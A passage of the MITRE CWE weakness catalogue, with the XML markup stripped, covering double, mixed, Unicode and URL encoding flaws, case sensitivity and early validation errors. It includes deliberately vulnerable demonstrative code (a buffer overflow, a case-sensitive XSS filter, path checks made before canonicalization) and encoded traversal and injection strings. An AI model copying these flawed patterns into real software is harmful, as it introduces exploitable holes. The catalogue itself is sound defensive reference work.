UTF-8. When an encoding is not specified, a downstream component may choose a different encoding, either by assuming a default encoding or automatically inferring which encoding is being used, which can be erroneous. When the encodings are inconsistent, the downstream component might treat some character or byte sequences as special, even if they are not special in the original encoding. Attackers might then be able to exploit this discrepancy and conduct injection attacks; they even might be able to bypass protection mechanisms that assume the original encoding is also being used by the downstream component. + + + Implementation + Input Validation + Inputs should be decoded and canonicalized to the application's current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked. + + + + + Alternate Encoding + + + + + + + + + + + + + + + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-07-27 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2010-12-13 + updated Name + + + CWE Content Team + MITRE + 2011-03-29 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Related_Attack_Patterns, Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms + + + CWE Content Team + MITRE + 2019-01-03 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2019-06-20 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2020-02-24 + updated Potential_Mitigations, Relationships + + + CWE Content Team + MITRE + 2020-06-25 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Alternate Encoding + Failure to Handle Alternate Encoding + + + + The product decodes the same input twice, which can limit the effectiveness of any protection mechanism that occurs in between the decoding operations. + + + + + + + + + + Implementation + + + + + Access Control + Confidentiality + Availability + Integrity + Other + Bypass Protection Mechanism + Execute Unauthorized Code or Commands + Varies by Context + + + + + Architecture and Design + Input Validation + Avoid making decisions based on names of resources (e.g. files) if those resources can have alternate names. + + + Implementation + Input Validation + + Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. + When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." + Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright. + + + + Implementation + Output Encoding + Use and specify an output encoding that can be handled by the downstream component that is reading the output. Common encodings include ISO-8859-1, UTF-7, and UTF-8. When an encoding is not specified, a downstream component may choose a different encoding, either by assuming a default encoding or automatically inferring which encoding is being used, which can be erroneous. When the encodings are inconsistent, the downstream component might treat some character or byte sequences as special, even if they are not special in the original encoding. Attackers might then be able to exploit this discrepancy and conduct injection attacks; they even might be able to bypass protection mechanisms that assume the original encoding is also being used by the downstream component. + + + Implementation + Input Validation + Inputs should be decoded and canonicalized to the application's current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked. + + + + + CVE-2004-1315 + Forum software improperly URL decodes the highlight parameter when extracting text to highlight, which allows remote attackers to execute arbitrary PHP code by double-encoding the highlight value so that special characters are inserted into the result. + https://www.cve.org/CVERecord?id=CVE-2004-1315 + + + CVE-2004-1939 + XSS protection mechanism attempts to remove "/" that could be used to close tags, but it can be bypassed using double encoded slashes (%252F) + https://www.cve.org/CVERecord?id=CVE-2004-1939 + + + CVE-2001-0333 + Directory traversal using double encoding. + https://www.cve.org/CVERecord?id=CVE-2001-0333 + + + CVE-2004-1938 + "%2527" (double-encoded single quote) used in SQL injection. + https://www.cve.org/CVERecord?id=CVE-2004-1938 + + + CVE-2005-1945 + Double hex-encoded data. + https://www.cve.org/CVERecord?id=CVE-2005-1945 + + + CVE-2005-0054 + Browser executes HTML at higher privileges via URL with hostnames that are double hex encoded, which are decoded twice to generate a malicious hostname. + https://www.cve.org/CVERecord?id=CVE-2005-0054 + + + + + Double Encoding + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + Probably under-studied. + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Observed_Example, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2008-11-24 + updated Observed_Examples + + + CWE Content Team + MITRE + 2009-07-27 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2011-03-29 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Common_Consequences, Observed_Examples, Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms + + + CWE Content Team + MITRE + 2020-02-24 + updated Potential_Mitigations, Relationships + + + CWE Content Team + MITRE + 2020-06-25 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Double Encoding + + + + The product does not properly handle when the same input uses several different (mixed) encodings. + + + + + + + + + Implementation + + + + + Integrity + Unexpected State + + + + + Architecture and Design + Input Validation + Avoid making decisions based on names of resources (e.g. files) if those resources can have alternate names. + + + Implementation + Input Validation + + Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. + When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." + Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright. + + + + Implementation + Output Encoding + Use and specify an output encoding that can be handled by the downstream component that is reading the output. Common encodings include ISO-8859-1, UTF-7, and UTF-8. When an encoding is not specified, a downstream component may choose a different encoding, either by assuming a default encoding or automatically inferring which encoding is being used, which can be erroneous. When the encodings are inconsistent, the downstream component might treat some character or byte sequences as special, even if they are not special in the original encoding. Attackers might then be able to exploit this discrepancy and conduct injection attacks; they even might be able to bypass protection mechanisms that assume the original encoding is also being used by the downstream component. + + + Implementation + Input Validation + Inputs should be decoded and canonicalized to the application's current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked. + + + + + Mixed Encoding + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-07-27 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2010-12-13 + updated Name + + + CWE Content Team + MITRE + 2011-03-29 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-06-27 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms + + + CWE Content Team + MITRE + 2020-02-24 + updated Potential_Mitigations, Relationships + + + CWE Content Team + MITRE + 2020-06-25 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Mixed Encoding + Failure to Handle Mixed Encoding + + + + The product does not properly handle when an input contains Unicode encoding. + + + + + + + + + Implementation + + + + + Integrity + Unexpected State + + + + + Architecture and Design + Input Validation + Avoid making decisions based on names of resources (e.g. files) if those resources can have alternate names. + + + Implementation + Input Validation + + Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. + When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." + Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright. + + + + Implementation + Input Validation + Inputs should be decoded and canonicalized to the application's current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked. + + + + + Windows provides the MultiByteToWideChar(), WideCharToMultiByte(), UnicodeToBytes(), and BytesToUnicode() functions to convert between arbitrary multibyte (usually ANSI) character strings and Unicode (wide character) strings. The size arguments to these functions are specified in different units, (one in bytes, the other in characters) making their use prone to error. + In a multibyte character string, each character occupies a varying number of bytes, and therefore the size of such strings is most easily specified as a total number of bytes. In Unicode, however, characters are always a fixed size, and string lengths are typically given by the number of characters they contain. Mistakenly specifying the wrong units in a size argument can lead to a buffer overflow. + The following function takes a username specified as a multibyte string and a pointer to a structure for user information and populates the structure with information about the specified user. Since Windows authentication uses Unicode for usernames, the username argument is first converted from a multibyte string to a Unicode string. + + void getUserInfo(char *username, struct _USER_INFO_2 info){WCHAR unicodeUser[UNLEN+1];MultiByteToWideChar(CP_ACP, 0, username, -1, unicodeUser, sizeof(unicodeUser));NetUserGetInfo(NULL, unicodeUser, 2, (LPBYTE *)&info);} + + This function incorrectly passes the size of unicodeUser in bytes instead of characters. The call to MultiByteToWideChar() can therefore write up to (UNLEN+1)*sizeof(WCHAR) wide characters, or (UNLEN+1)*sizeof(WCHAR)*sizeof(WCHAR) bytes, to the unicodeUser array, which has only (UNLEN+1)*sizeof(WCHAR) bytes allocated. + If the username string contains more than UNLEN characters, the call to MultiByteToWideChar() will overflow the buffer unicodeUser. + + + + + CVE-2000-0884 + Server allows remote attackers to read documents outside of the web root, and possibly execute arbitrary commands, via malformed URLs that contain Unicode encoded characters. + https://www.cve.org/CVERecord?id=CVE-2000-0884 + + + CVE-2001-0709 + Server allows a remote attacker to obtain source code of ASP files via a URL encoded with Unicode. + https://www.cve.org/CVERecord?id=CVE-2001-0709 + + + CVE-2001-0669 + Overlaps interaction error. + https://www.cve.org/CVERecord?id=CVE-2001-0669 + + + + + Unicode Encoding + + + MSC10-C + Character Encoding - UTF8 Related Issues + + + + + + + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2008-11-24 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-03-10 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2009-05-27 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2009-07-27 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2010-12-13 + updated Name + + + CWE Content Team + MITRE + 2011-03-29 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-06-27 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-09-13 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-05-11 + updated Observed_Examples, References, Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2020-02-24 + updated Potential_Mitigations, Relationships + + + CWE Content Team + MITRE + 2020-06-25 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Unicode Encoding + Failure to Handle Unicode Encoding + + + + The product does not properly handle when all or part of an input has been URL encoded. + + + + + + + + + Implementation + + + + + Integrity + Unexpected State + + + + + Architecture and Design + Input Validation + Avoid making decisions based on names of resources (e.g. files) if those resources can have alternate names. + + + Implementation + Input Validation + + Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. + When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." + Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright. + + + + Implementation + Input Validation + Inputs should be decoded and canonicalized to the application's current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked. + + + + + CVE-2000-0900 + Hex-encoded path traversal variants - "%2e%2e", "%2e%2e%2f", "%5c%2e%2e" + https://www.cve.org/CVERecord?id=CVE-2000-0900 + + + CVE-2005-2256 + Hex-encoded path traversal variants - "%2e%2e", "%2e%2e%2f", "%5c%2e%2e" + https://www.cve.org/CVERecord?id=CVE-2005-2256 + + + CVE-2004-2121 + Hex-encoded path traversal variants - "%2e%2e", "%2e%2e%2f", "%5c%2e%2e" + https://www.cve.org/CVERecord?id=CVE-2004-2121 + + + CVE-2004-0280 + "%20" (encoded space) + https://www.cve.org/CVERecord?id=CVE-2004-0280 + + + CVE-2003-0424 + "%20" (encoded space) + https://www.cve.org/CVERecord?id=CVE-2003-0424 + + + CVE-2001-0693 + "%20" (encoded space) + https://www.cve.org/CVERecord?id=CVE-2001-0693 + + + CVE-2001-0778 + "%20" (encoded space) + https://www.cve.org/CVERecord?id=CVE-2001-0778 + + + CVE-2002-1831 + Crash via hex-encoded space "%20". + https://www.cve.org/CVERecord?id=CVE-2002-1831 + + + CVE-2000-0671 + "%00" (encoded null) + https://www.cve.org/CVERecord?id=CVE-2000-0671 + + + CVE-2004-0189 + "%00" (encoded null) + https://www.cve.org/CVERecord?id=CVE-2004-0189 + + + CVE-2002-1291 + "%00" (encoded null) + https://www.cve.org/CVERecord?id=CVE-2002-1291 + + + CVE-2002-1031 + "%00" (encoded null) + https://www.cve.org/CVERecord?id=CVE-2002-1031 + + + CVE-2001-1140 + "%00" (encoded null) + https://www.cve.org/CVERecord?id=CVE-2001-1140 + + + CVE-2004-0760 + "%00" (encoded null) + https://www.cve.org/CVERecord?id=CVE-2004-0760 + + + CVE-2002-1025 + "%00" (encoded null) + https://www.cve.org/CVERecord?id=CVE-2002-1025 + + + CVE-2002-1213 + "%2f" (encoded slash) + https://www.cve.org/CVERecord?id=CVE-2002-1213 + + + CVE-2004-0072 + "%5c" (encoded backslash) and "%2e" (encoded dot) sequences + https://www.cve.org/CVERecord?id=CVE-2004-0072 + + + CVE-2004-0847 + "%5c" (encoded backslash) + https://www.cve.org/CVERecord?id=CVE-2004-0847 + + + CVE-2002-1575 + "%0a" (overlaps CRLF) + https://www.cve.org/CVERecord?id=CVE-2002-1575 + + + + + URL Encoding (Hex Encoding) + + + + + + + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations, Time_of_Introduction + + + Veracode + 2008-08-15 + Suggested OWASP Top Ten 2004 mapping + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Observed_Example, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-07-27 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2010-12-13 + updated Name + + + CWE Content Team + MITRE + 2011-03-29 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-06-27 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Related_Attack_Patterns, Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms + + + CWE Content Team + MITRE + 2019-01-03 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2020-02-24 + updated Potential_Mitigations, Relationships + + + CWE Content Team + MITRE + 2020-06-25 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + URL Encoding (Hex Encoding) + Failure to Handle URL Encoding (Hex Encoding) + + + + The product does not properly account for differences in case sensitivity when accessing or determining the properties of a resource, leading to inconsistent results. + + Improperly handled case sensitive data can lead to several possible consequences, including: + + case-insensitive passwords reducing the size of the key space, making brute force attacks easier + bypassing filters or access controls using alternate names + multiple interpretation errors using alternate names. + + + + + + + + + + + + + + Implementation + + + + + Access Control + Bypass Protection Mechanism + + + + + Architecture and Design + Input Validation + Avoid making decisions based on names of resources (e.g. files) if those resources can have alternate names. + + + Implementation + Input Validation + + Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. + When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." + Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright. + + + + Implementation + Input Validation + Inputs should be decoded and canonicalized to the application's current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked. + + + + + In the following example, an XSS neutralization method intends to replace script tags in user-supplied input with a safe equivalent: + + public String preventXSS(String input, String mask) {return input.replaceAll("script", mask);} + + The code only works when the "script" tag is in all lower-case, forming an incomplete denylist (CWE-184). Equivalent tags such as "SCRIPT" or "ScRiPt" will not be neutralized by this method, allowing an XSS attack. + + + + + CVE-2000-0499 + Application server allows attackers to bypass execution of a jsp page and read the source code using an upper case JSP extension in the request. + https://www.cve.org/CVERecord?id=CVE-2000-0499 + + + CVE-2000-0497 + The server is case sensitive, so filetype handlers treat .jsp and .JSP as different extensions. JSP source code may be read because .JSP defaults to the filetype "text". + https://www.cve.org/CVERecord?id=CVE-2000-0497 + + + CVE-2000-0498 + The server is case sensitive, so filetype handlers treat .jsp and .JSP as different extensions. JSP source code may be read because .JSP defaults to the filetype "text". + https://www.cve.org/CVERecord?id=CVE-2000-0498 + + + CVE-2001-0766 + A URL that contains some characters whose case is not matched by the server's filters may bypass access restrictions because the case-insensitive file system will then handle the request after it bypasses the case sensitive filter. + https://www.cve.org/CVERecord?id=CVE-2001-0766 + + + CVE-2001-0795 + Server allows remote attackers to obtain source code of CGI scripts via URLs that contain MS-DOS conventions such as (1) upper case letters or (2) 8.3 file names. + https://www.cve.org/CVERecord?id=CVE-2001-0795 + + + CVE-2001-1238 + Task Manager does not allow local users to end processes with uppercase letters named (1) winlogon.exe, (2) csrss.exe, (3) smss.exe and (4) services.exe via the Process tab which could allow local users to install Trojan horses that cannot be stopped. + https://www.cve.org/CVERecord?id=CVE-2001-1238 + + + CVE-2003-0411 + chain: Code was ported from a case-sensitive Unix platform to a case-insensitive Windows platform where filetype handlers treat .jsp and .JSP as different extensions. JSP source code may be read because .JSP defaults to the filetype "text". + https://www.cve.org/CVERecord?id=CVE-2003-0411 + + + CVE-2002-0485 + Leads to interpretation error + https://www.cve.org/CVERecord?id=CVE-2002-0485 + + + CVE-1999-0239 + Directories may be listed because lower case web requests are not properly handled by the server. + https://www.cve.org/CVERecord?id=CVE-1999-0239 + + + CVE-2005-0269 + File extension check in forum software only verifies extensions that contain all lowercase letters, which allows remote attackers to upload arbitrary files via file extensions that include uppercase letters. + https://www.cve.org/CVERecord?id=CVE-2005-0269 + + + CVE-2004-1083 + Web server restricts access to files in a case sensitive manner, but the filesystem accesses files in a case insensitive manner, which allows remote attackers to read privileged files using alternate capitalization. + https://www.cve.org/CVERecord?id=CVE-2004-1083 + + + CVE-2002-2119 + Case insensitive passwords lead to search space reduction. + https://www.cve.org/CVERecord?id=CVE-2002-2119 + + + CVE-2004-2214 + HTTP server allows bypass of access restrictions using URIs with mixed case. + https://www.cve.org/CVERecord?id=CVE-2004-2214 + + + CVE-2004-2154 + Mixed upper/lowercase allows bypass of ACLs. + https://www.cve.org/CVERecord?id=CVE-2004-2154 + + + CVE-2005-4509 + Bypass malicious script detection by using tokens that aren't case sensitive. + https://www.cve.org/CVERecord?id=CVE-2005-4509 + + + CVE-2002-1820 + Mixed case problem allows "admin" to have "Admin" rights (alternate name property). + https://www.cve.org/CVERecord?id=CVE-2002-1820 + + + CVE-2007-3365 + Chain: uppercase file extensions causes web server to return script source code instead of executing the script. + https://www.cve.org/CVERecord?id=CVE-2007-3365 + + + CVE-2021-39155 + Chain: A microservice integration and management platform compares the hostname in the HTTP Host header in a case-sensitive way (CWE-178, CWE-1289), allowing bypass of the authorization policy (CWE-863) using a hostname with mixed case or other variations. + https://www.cve.org/CVERecord?id=CVE-2021-39155 + + + + File Processing + + + File or Directory + + + + Case Sensitivity (lowercase, uppercase, mixed case) + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + These are probably under-studied in Windows and Mac environments, where file names are case-insensitive and thus are subject to equivalence manipulations involving case. + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Sean Eidemiller + Cigital + 2008-07-01 + added/updated demonstrative examples + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Description, Relationships, Observed_Example, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2008-10-14 + updated Observed_Examples + + + CWE Content Team + MITRE + 2008-11-24 + updated Observed_Examples + + + CWE Content Team + MITRE + 2009-03-10 + updated Description + + + CWE Content Team + MITRE + 2009-07-27 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2010-06-21 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2010-12-13 + updated Name + + + CWE Content Team + MITRE + 2011-03-29 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Observed_Examples, Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Demonstrative_Examples, Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Affected_Resources, Applicable_Platforms, Functional_Areas, Relationships + + + CWE Content Team + MITRE + 2019-06-20 + updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Potential_Mitigations, Relationships + + + CWE Content Team + MITRE + 2020-06-25 + updated Demonstrative_Examples, Potential_Mitigations, Relationships + + + CWE Content Team + MITRE + 2021-03-15 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2022-10-13 + updated Observed_Examples + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Case Sensitivity (Lowercase, Uppercase, Mixed Case) + Failure to Resolve Case Sensitivity + + + + The product validates input before applying protection mechanisms that modify the input, which could allow an attacker to bypass the validation via dangerous inputs that only arise after the modification. + Product needs to validate data at the proper time, after data has been canonicalized and cleansed. Early validation is susceptible to various manipulations that result in dangerous inputs that are produced by canonicalization and cleansing. + + + + + + + + + + Implementation + Since early validation errors usually arise from improperly implemented defensive mechanisms, it is likely that these will be introduced more frequently as secure programming becomes implemented more widely. + + + + + Access Control + Integrity + Bypass Protection Mechanism + Execute Unauthorized Code or Commands + An attacker could include dangerous input that bypasses validation protection mechanisms which can be used to launch various attacks including injection attacks, execute arbitrary code or cause other unintended behavior. + + + + + Implementation + Input Validation + Inputs should be decoded and canonicalized to the application's current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked. + + + + + The following code attempts to validate a given input path by checking it against an allowlist and then return the canonical path. In this specific case, the path is considered valid if it starts with the string "/safe_dir/". + + String path = getInputPath();if (path.startsWith("/safe_dir/")){File f = new File(path);return f.getCanonicalPath();} + + The problem with the above code is that the validation step occurs before canonicalization occurs. An attacker could provide an input path of "/safe_dir/../" that would pass the validation step. However, the canonicalization process sees the double dot as a traversal to the parent directory and hence when canonicized the path would become just "/". + To avoid this problem, validation should occur after canonicalization takes place. In this case canonicalization occurs during the initialization of the File object. The code below fixes the issue. + + String path = getInputPath();File f = new File(path);if (f.getCanonicalPath().startsWith("/safe_dir/")){return f.getCanonicalPath();} + + + + + + This script creates a subdirectory within a user directory and sets the user as the owner. + + function createDir($userName,$dirName){$userDir = '/users/'. $userName;if(strpos($dirName,'..') !== false){echo 'Directory name contains invalid sequence';return;} + //filter out '~' because other scripts identify user directories by this prefix + $dirName = str_replace('~','',$dirName);$newDir = $userDir . $dirName;mkdir($newDir, 0700);chown($newDir,$userName);} + + While the script attempts to screen for '..' sequences, an attacker can submit a directory path including ".~.", which will then become ".." after the filtering step. This allows a Path Traversal (CWE-21) attack to occur. + + + + + CVE-2002-0433 + Product allows remote attackers to view restricted files via an HTTP request containing a "*" (wildcard or asterisk) character. + https://www.cve.org/CVERecord?id=CVE-2002-0433 + + + CVE-2003-0332 + Product modifies the first two letters of a filename extension after performing a security check, which allows remote attackers to bypass authentication via a filename with a .ats extension instead of a .hts extension. + https://www.cve.org/CVERecord?id=CVE-2003-0332 + + + CVE-2002-0802 + Database consumes an extra character when processing a character that cannot be converted, which could remove an escape character from the query and make the application subject to SQL injection attacks. + https://www.cve.org/CVERecord?id=CVE-2002-0802 + + + CVE-2000-0191 + Overlaps "fakechild/../realchild" + https://www.cve.org/CVERecord?id=CVE-2000-0191 + + + CVE-2004-2363 + Product checks URI for "<" and other literal characters, but does it before hex decoding the URI, so "%3E" and other sequences are allowed. + https://www.cve.org/CVERecord?id=CVE-2004-2363 + + + CVE-2002-0934 + Directory traversal vulnerability allows remote attackers to read or modify arbitrary files via invalid characters between two . (dot) characters, which are filtered and result in a ".." sequence. + https://www.cve.org/CVERecord?id=CVE-2002-0934 + + + CVE-2003-0282 + Directory traversal vulnerability allows attackers to overwrite arbitrary files via invalid characters between two . (dot) characters, which are filtered and result in a ".." sequence. + https://www.cve.org/CVERecord?id=CVE-2003-0282 + + + + + Early Validation Errors + + + + + + + + + + 